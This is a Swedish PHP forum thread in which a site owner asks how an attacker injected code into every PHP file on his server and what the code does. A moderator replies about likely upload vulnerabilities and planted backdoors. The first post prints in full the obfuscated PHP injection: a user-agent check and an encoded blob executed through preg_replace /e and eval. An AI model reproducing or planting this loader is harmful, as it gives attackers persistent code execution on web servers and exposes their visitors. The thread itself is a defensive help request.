Hackade webbsidor

PHPportalen Forum Index » Webbservrar och operativsystem
Lägg ett bokmärke på hela tråden
Skapa nytt inlägg   Svara på inlägget
Visa föregående ämne :: Visa nästa ämne  
Startad av: Meddelande
info@aimdesign.se



Medlem i: 4076 dagar
Från: Märsta
Status: Offline



#739979
Inlägg Skrivet: 2015-10-19 13:06      Ämne: Hackade webbsidor Citera

Tjena!
Detta kanske är fel forumdel för fråga, admin får gärna flytta den i så fall.

Min server har blivit utsatt för en attack och blivit hackad så tillvida att alla php-filer har följande kod på första raden:

KOD:
1:
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $iunboyjiil = '<%x5c%x7825b:>1<!gps)%5]48]32M3]317]445]212]445]43]321]46]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5f%x5c%x7860opjudovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmb:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>1<!fmtfx5c%x7825)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5>>2*!%x5c%x7825z>3<!f!-#j0#!%x5c%x782f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcx5c%x7860cpV%x5c%x787f%x5c%x787f%x5c%x787f%x5c%x787f<u%x5c%x782163%x70%154%x69%164%50%x22%134%x78%62%x35%165x5c%x785cq%x5c%x78257%x5c%x782f7#@#7%x5c%x7c%x7824-%x5c%x7824!>!tus%x*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<#65,7825)euhA)3of>2bd%x5c%x7825x5c%x7822!ftmbg)!gj<*#k#)usbut%5c%x7825r%x5c%x7878B%x5c%x7825h>#]y31]278]y35c%x7824]y8%x5c%x7824-%x5c%x7824]5]y72]254]y76]61]y33]68]y34]68]y33]6A7>q%x5c%x78256<%x5c%x787fw6*%x5cx7825tzw>!#]y76]277]y72]265]y39]%x787f_*#fubfsdXk5%x5c%x786b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Z<#opo#>b%x5c%x7825!)sf%x5c%x7878pmpusut0{66~6<&w6<%x5c%x787fw6*CW&)7gj6<*doj%x55c%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gps)7825ff2!>!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%x78%x5c%x7822)gj!|!*nbsbq%x5c%x5c%x782f#00#W~!Ydr7-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujoj274]y85]273]y6g]273]y%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}3]83]238M7]381]211M5]67]452]88]%x7827&6<*rfs%x5c%x78257-K)fujs%x5c%x787c%x7825)7gj6<**2qj%x5c%x7825)ho%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x787f!>78:-!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#P#-#Q#-#B#-#T#-#E#0{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd]82#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%x7825bss-%x", NULL); }#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5c%sf%x5c%x7878pmpusut)tpqssutRe%x55V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<5c%x782f%x5c%x7825r%x5c%x7878<~!!%x5c%x7825#-#%x5c%x7824-%x5c%x7824-tusqpt)%x5c%x7825z-#:#*%x57825)!gj!<**2-4-bubE{h%x5c%x7825)sutcvt)esp>hmg%x5c%7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy5c%x787f;!|!}{;)gj}l;33bq}k;opjudovg}%x5c%x7878;0]=])0#85-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#%x5x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmdR6<*i5c%x7824-%x5c%x7824y4%x5c%x7824-%x*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5c%x7825)sutcvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5g!osvufs!|ftmf!~<**9.-j%x5c%x7825-bubE{h%x5c%x7825)sutcc#<%x5c%x7825tpz!>!#]D6M7BFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fubfsd#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x0hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.x5c%x7822)7gj6<*QDU%x5c%x7860MPT7-N787fw6<*K)ftpmdXA6|7**197-2qj%x5c%x78257-K)udfoopdXA%%x3a%146%x21%76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]c%x7824<!%x5c%x7825o:!>!%x5c%x7824c%x7825-#1GO%x5c%x782273]y76]258]y6g]273]y76]271]y7d27)fepdof.)fepdof.%x5c%x782f#@#%x5c%x25%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!2p%x]252]y74]256#<!%x5c%x]DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y3]y76]258]y6g]273]y76]271]y7d]252]y74]256#<]275]y7:]268]y7f#<!%x5c%x7825tww!>!%x5c%x7c%x7825cB%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785%x5c%x786057ftbc%x5c%x787f!|!*uyfu%x5c%x78c1^W%x5c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5c%x7825cIjQeTQcO%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5c%x7860ftsbq@error_reporting(0); preg_replace("%x2f%50%x2e%52c%x782f#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]K7827;mnui}&;zepc}A;~!}%x7827pd%x5c%x78256<pd%x5c%x]55#*<%x5c%x7825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c%x78XA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5c%x782272qj%x52f},;#-#}+;%x5c%x7825-qp%x5c%x7825)54l}%x5c%x7827;%x5c%x7825!<*#]58y]472]37y]672]48y]#>s%x5c%x7825<#462]47y]252]18y]#>q%*qp%x5c%x7825!-uyfu%x5c%x7825)3of)fepdofW&)7gj6<.[A%x5c%x7827&6<%x5c%x78|:*mmvo:>:iuhofm%x5c%x7825:-5ppd5j:^<!%x5c%x7825w%x5c%x7860%x%x61"]=1; function fjfgg($n){return chr(ord($n)-1);} 825:osvufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:|:82400~:<h%x5c%x7825_t%x5825)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%2178}527}88:}334}472%x5c%x7824<d%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*12!%x5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x78]y74]273]y76]252]y85]256]y6g]257]y86]267]y74fepmqnj!%x5c%x782f!#0#)idubn%x5c%x7860hfsq)!svt)fubmgoj{hA!osvufs!~<3,j%x5c%x7825>j%x5c%x7825!4-%x5c%x7824gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%x782uft%x5c%x7860msvd},;uqpuft%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>>!}}_;#)323ldfid>}&;!osvufs}%x5c%x78v}.;%x5c%x782f#%x5c%x782f#%x5c%x78x5c%x7825j:>1<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%x5c%x7825jx782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y81]27mtf!%x5c%x7825z>2<!%x5c%x7825ww2)%x5c%x7825w%x5c%x7860T25j:.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5c%x7825s:%x5c%x785c%x5c%x782j%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%xUTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5c7#6#)tutjyf%x5c%x7860439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:x7824-%x5c%x7824*<!%x5c%x782825bT-%x5c%x7825hW~%x5c%x7825fdy)##-63]y3:]68]y76#<%x5c%x78e%x5c%x78b%x5c%x7825w:!>!%x5c%x78246767~6<Cw{**#k#)tutjyf%x5c%x7860%x5c%x7878%tcvt)!gj!|!*bubE{h%x5c%x7825)j{hnpd!opjudovg!|!5c%x7860sfqmbdf)%x5c%x7825%x>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<%47R25,d7R17,67R37,#%x5c%x782fq%x5c%x7825>U<#16,47R57,27R66,#%x5c%x782c%x78257-C)fepmqnjA%x5c%x7827&6<.fmjgA%x5c%x7827doj%%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x5c%x782f#pm3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%x5c%x7825)x5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7%x5c%!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]y76]277]y72]265]y39]271]x782f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x5c%x7824*<!%x%x5c%x782f#%x5c%x7825#%x5c%x782f#o]#%x5c%x791y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)su<***f%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%x78*3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%k3%x5c%x7860{666~6<&w6<%x5c%x787fw6*C)U!%x5c%x7827{**u%x5c%c%x7825)323ldfidk!~!<*7jsv%x5c%x78256<C>^#zsfvr#%x5c%x785cq%x5c%x78257**^#zsfv7,18R#>q%x5c%x7825V<*#fopoV;h85c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x78255c%x7827*&7-n%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6gP7L6M7]D4]275]D:M8]Df#<%x5c%x782r#%x5c%x785cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c%x785cq782fqp%x5c%x7825>5h%x5c%x7825!<*::::::-111112)eobx64%145%x28%141%x72%162%x61%171%x5f%4#-!OVMM*<%x22%51%x29%51%x29%73%x5c%x7825,3,j%x5c%x7825>j%x5c%x7825!<**3-j%x5c%x7825-bubE{hx5c%x7825tmw!>!#]y84]275]y83]273]y76]277#<%x5c%x7825t2w>#00#W~!%x5c%x7825t2w)##Qtjw)#76]271]y7d]252]y74]256]y39]252]y83]273]y72]282#<!%x5c%x7825tjw!c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x7827!hmg%x5c%x7825)!gj!<2,*5%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x7860gvodujpo)##-!#~<#%x5c%5csboe))1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x%x7860QUUI&c_UOFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%s:N}#-%x5c%x7825o:W%x5c%x7825c:>1!<5h%x5c%x7825%x5c%x782f#0#%x5c%x782f*#npd%x25h>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#QwTW%x5c%x7825hIr7f;!opjudovg}k~~9{d%x5c%x725fdy<Cb*[%x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x7%x29%57%x65","%x65%166%x61%154%x28%151%x6d%160%x6c%157%r%x5c%x7825)s%x5c%x7825>%x5c%x782fh%x5c%x7825:sset($GLOBALS["%x61%156%x75%156%x61"])))) { $GLOBALS["%x61%156%x75%156fnbozcYufhA%x5c%x78272qj%x5c%x78256<^#zsfvr#%SFT%x5c%x7860%x5c%x7825}X;!sp!*#opo#>>}R;ms5tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%x5c%x7867<&w6<*&7-#o]s]o]s]#)fepmqyf%x6<pd%x5c%x7825w6Z6<.5%x5c%x786ojepdoF.uofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x78785c%x7878W~!Ypp2)%x5c%x7825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x7882f*)323zbe!-#jt0*?]+^?]_%x5c%x785c}X%x5c%x7824<!%x5c%5]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]82]y76]62]y3:]8p!*#ojneb#-*f%x5c%x7825)]y4c#<!%x5c%x7825t::!>!%x5c%x7824Ypp3)%x5c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x8X6<#o]o]Y%x5c%x78257;utpI#7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%x5c%xs%x5c%x7860un>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7825!|!*!***b%x5c%x7825ssbnpe_GMFT%x5c%x7860QIQ&f_c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+99386c6f+7fw6*%x5c%x787f_*#[k2%x5c%x7866<u%x5c%x78257>%x5c%x782f7&6|7**111127-K)ebfsX%x5c%x7827u%x5c8]37]278]225]241]334]368]322]3]364]6]283]427]36]373P6]36]7c%x7878:<##:>:h%x5c%x7825:<#64y]552]e7y]#>n%x5c%x7825<#372%x5c%x7860UQPMSVD!-id%x5c%x7825)uqpx7825-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x7825!-#2#27k:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785cSFW82f7^#iubq#%x5c%x785cq%x5c%x7825%x5c%x782y83]256]y78]248]y83]256]y81]26c%x7825)3of:opjudovg<~%x5x7825!-#1]#-bubE{h%x524-!%x5c%x7825%x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5c%x7R%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#ujojR>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;#)tutjy%x5c%x78256<C%x5c%x7827pd%x5c%x78256|6.7eu{66~!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4Pso!%x5c%x7825bss%x5c%x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ldufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x7825)}.;if((function_exists("%x6f%142%x5f%163%x74%141%x72%164") && (!ix5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7c%x7825:osvufs:~:<*9-1-x7825!<12>j%x5c%x7825!|!*#5c%x782f#)rrd%x5c%x782f#00;quui#>.%x5c%x7825!4]284]364]6]234]342]58]24]31#-%x5c%x7825tdz*Wsfuv-%x5c%x7878r.985:529W~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x5c%x7825%x5c%x78e:4:|:**#ppde#)tutjyf%x5c%x78604%5c%x787f_*#fmjgk4%x5c%x7860{6~6<tfs%x5c%x7825w6<%otn+qsvmt+fmhpph#)zbssb!-#}#)!%x5c%x7825mm!>!#]y81]2x5c%x7825!|!*)323zbek!~!<5c%x7825kj:!>!#]y3d]51]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]627825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%x5c%x7860c%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<%x5c%xr)%x5c%x7825r%x5c%x7878Bsfuvso!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x-#G#-#H#-#I#-#K#-#L#-e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:564%x5c%x7860hA%x5c%x7827pd%x5c%x78256fq%x5c%x7825>2q%x5c%x7825<#g6R85,67R3155%x61%160%x28%42%x66%152%x66%147%x67%42%x2c%163%x74%162%x5f%26%x5c%x7824-%x5c%x7824<%x5c%x7825j,,*!|%x5c%x7824-%<**#57]38y]47]67y]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x782fh%5c%x7825!*3>?*2b%x5c%x7825)gpf{jt)!gj!<*2bd%x5%x7825)7fmji%x5c%x78786<C%x5c**#j{hnpd#)tutjyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~!<2p%x5c%x78782f#p#%x5c%x782f%x5c%x7825z<jg!)%x5c%x7825z9f5d816:+946:ce44#)zbssb!>!x5c%x7822l:!}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%xx5c%x7825<#762]67y]562]38y]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5x5c%x78256<%x5c%x787fw6*%x/(.*)/epreg_replacelthfikvktm'; $cevyzsjsra = explode(chr((307-263)),'8626,62,6937,70,3714,53,3180,49,6836,55,6089,36,9568,62,400,45,2553,58,4843,67,7170,30,2420,45,9495,36,7595,38,3323,26,9189,35,8417,46,7139,31,5883,64,7818,61,9794,29,1225,40,7533,62,9281,65,2500,53,2465,35,2329,44,3401,60,1265,31,5251,53,7007,45,445,43,8126,41,5745,56,5981,59,3128,52,728,33,793,27,896,40,5138,52,10080,26,8997,49,2008,57,3931,58,1072,61,8310,56,5664,37,3621,32,7788,30,1464,39,9224,57,8582,44,7995,35,4229,64,1348,58,8366,51,99,51,2249,55,4122,49,5621,43,8222,21,6364,64,4610,48,1854,43,6156,60,2138,58,7493,40,1802,52,8762,26,5517,39,4944,47,9823,64,2734,66,9748,46,2645,22,2373,47,557,27,6639,44,8788,45,5556,65,2697,37,6040,49,7633,68,876,20,277,60,9046,29,4077,45,7428,24,1624,32,7728,60,9931,27,7701,27,4658,55,6557,49,9098,25,820,56,2099,39,1026,25,5723,22,3581,40,3019,42,8084,42,7052,43,4326,34,3461,64,4293,33,6751,26,3767,46,4713,66,3653,32,8964,33,8688,51,3837,63,584,31,337,63,1656,52,514,43,5069,69,9531,37,5801,29,7200,49,4910,34,9958,53,3299,24,1897,55,5701,22,8030,54,5474,43,7317,54,761,32,1133,21,6301,63,5019,50,6216,57,4033,44,2907,42,3813,24,8739,23,6891,46,9682,66,195,61,2196,53,7937,58,3525,56,10011,69,8197,25,2611,34,3900,31,9075,23,2667,30,2800,21,978,48,8243,67,5830,53,1154,40,1751,51,488,26,4991,28,2065,34,659,33,9630,52,5304,46,4779,28,4171,58,6428,65,5411,63,9123,66,7452,41,2949,70,3061,67,1051,21,9346,68,7249,68,6683,68,5190,61,6273,28,1503,63,615,44,9435,60,8882,20,1952,56,3229,70,2304,25,57,42,2821,43,5947,34,7095,44,8539,43,3349,52,6777,59,4807,36,8463,52,7879,58,1194,31,22,35,8833,49,8515,24,6493,64,1708,43,6606,33,0,22,4360,59,150,45,3989,44,4544,66,3685,29,936,42,1296,52,9887,44,256,21,4489,55,8902,62,1406,58,9414,21,1577,47,4419,70,2864,43,5350,61,8167,30,692,36,7371,57,6125,31,1566,11'); $arepwtqsrs=substr($iunboyjiil,(64161-54055),(29-22)); if (!function_exists('rcjsxuaqdm')) { function rcjsxuaqdm($bxtxuvkrwy, $qhjmmitiij) { $fblmwqlpsf = NULL; for($hfozbntfau=0;$hfozbntfau<(sizeof($bxtxuvkrwy)/2);$hfozbntfau++) { $fblmwqlpsf .= substr($qhjmmitiij, $bxtxuvkrwy[($hfozbntfau*2)],$bxtxuvkrwy[($hfozbntfau*2)+1]); } return $fblmwqlpsf; };} $nrkcehsutq="\x20\57\x2a\40\x66\162\x72\171\x72\171\x78\162\x69\142\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\63\x35\55\x31\71\x38\51\x29\54\x20\143\x68\162\x28\50\x34\67\x39\55\x33\70\x37\51\x29\54\x20\162\x63\152\x73\170\x75\141\x71\144\x6d\50\x24\143\x65\166\x79\172\x73\152\x73\162\x61\54\x24\151\x75\156\x62\157\x79\152\x69\151\x6c\51\x29\51\x3b\40\x2f\52\x20\150\x72\161\x72\152\x64\141\x6f\160\x67\40\x2a\57\x20"; $tzrvwppyfq=substr($iunboyjiil,(51270-41157),(48-36)); $tzrvwppyfq($arepwtqsrs, $nrkcehsutq, NULL); $tzrvwppyfq=$nrkcehsutq; $tzrvwppyfq=(778-657); $iunboyjiil=$tzrvwppyfq-1; ?>


Jag har lyckats hitta script som åtgärdar detta hyfsat, men min fråga är såklart hur jag undviker detta i framtiden? Alla lösenord är bytta för att förhindra åtkomst via SSH eller FTP, men vad kan jag göra mer för att förhindra det?

Hur gör hackern för att injicera denna koden och vad är syftet med koden?

Tack på förhand.
 

_________________
På svengelska -> It's not the fart that kills you, it's the smäll
Till toppen på sidan
Visa användarprofil Skicka privat meddelande Besök användarens hemsida
harald_b
Moderator



Medlem i: 4898 dagar
Från: Tavesta
Status: Offline



#739983
Inlägg Skrivet: 2015-10-19 21:56      Ämne: Citera

Webbsidan har antagligen någon säkerhetslucka någonstans där det går, eller har gått, att ladda upp körbar kod.
Det kan röra sig om t.ex någon felkonstruerad filuppladdningsfunktion. Men det finns också många andra tänkbara sårbarheter.

Har man väl lyckats ladda upp körbar kod en gång så kan det mycket väl finnas inplanterade bakdörrar som möjliggör att ladda upp mer körbar kod. Det är möjligt att denna kod skulle kunna vara en sådan, men jag har ännu inte lyckats klura ut om så är fallet.

Koden är faktiskt riktigt spännande att avkoda, eftersom den innehåller flera lager av kod som genererar annan kod.
Men ger man sig på att avkoda den här koden så bör man ta det mycket försiktigt, så man inte råkar köra någon kod i misstag. Vare sig på den lokala php-servern eller i webbläsaren.
 

_________________
R.r - Ett fritt affärssystem
Till toppen på sidan
Visa användarprofil Skicka privat meddelande
info@aimdesign.se



Medlem i: 4076 dagar
Från: Märsta
Status: Offline



#739999
Inlägg Skrivet: 2015-10-28 10:52      Ämne: Citera

Tack för ditt svar harald_b! Har försökt läsa på så mycket som möjligt om detta på nätet, men har inte riktigt kommit fram till vad koden gör.

Jobbet med att ta bort gamla osäkra delar av webbplatser och säkra upp de befintliga påbörjas. Razz
 

_________________
På svengelska -> It's not the fart that kills you, it's the smäll
Till toppen på sidan
Visa användarprofil Skicka privat meddelande Besök användarens hemsida
Visa tidigare inlägg:   
Skapa nytt inlägg   Svara på inlägget
PHPportalen Forum Index » Webbservrar och operativsystem
Hoppa till:  
Du kan inte skapa nya inlägg i det här forumet
Du kan inte svara på inlägg i det här forumet
Du kan inte ändra dina inlägg i det här forumet
Du kan inte ta bort dina inlägg i det här forumet
Du kan inte rösta i det här forumet
Du kan inte bifoga filer i detta forum
Du kan inte ladda ner filer från detta forum
Kontakta oss på adressen: info@phpportalen.net
Webbplatsen bygger i grunden på phpBB © 2001, 2002 phpBB Group

Modifieringar har senare gjorts i systemet av PHPportalen
Sid och logotypdesign skapad av Daren Jularic